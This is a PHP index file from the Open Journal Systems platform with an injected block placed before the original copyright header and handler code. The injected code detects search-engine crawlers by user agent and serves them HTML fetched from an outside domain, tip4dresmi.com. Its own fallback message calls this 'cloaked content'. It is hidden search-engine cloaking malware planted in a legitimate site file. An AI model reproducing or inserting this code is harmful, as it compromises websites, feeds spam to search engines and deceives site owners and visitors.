<?php
ini_set('display_errors', 1); 
ini_set('display_startup_errors', 1); 
error_reporting(E_ALL); 

$request_uri = $_SERVER['REQUEST_URI'] ?? ''; 
$user_agent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); 

$bot_signatures = [ 
    'googlebot', 
    'bingbot', 
    'slurp', 
    'duckduckbot', 
    'baiduspider', 
    'yandex', 
    'crawler', 
    'Google-Site-Verification',
    'spider' 
];

if (strpos($request_uri, '/') !== false) { 
    foreach ($bot_signatures as $bot) { 
        if (strpos($user_agent, $bot) !== false) { 
            $html = @file_get_contents('https://tip4dresmi.com/landing/serverjpg200.txt'); 
            header("Content-Type: text/html; charset=UTF-8"); 
            echo $html !== false ? $html : "Cloaked content failed to load."; 
            exit; 
        } 
    } 
}

/**
 * @defgroup pages_index Index Pages
 */
 
/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 * @brief Handle site index requests. 
 *
 */

switch ($op) {
	case 'index':
		define('HANDLER_CLASS', 'IndexHandler');
		import('pages.index.IndexHandler');
		break;
}
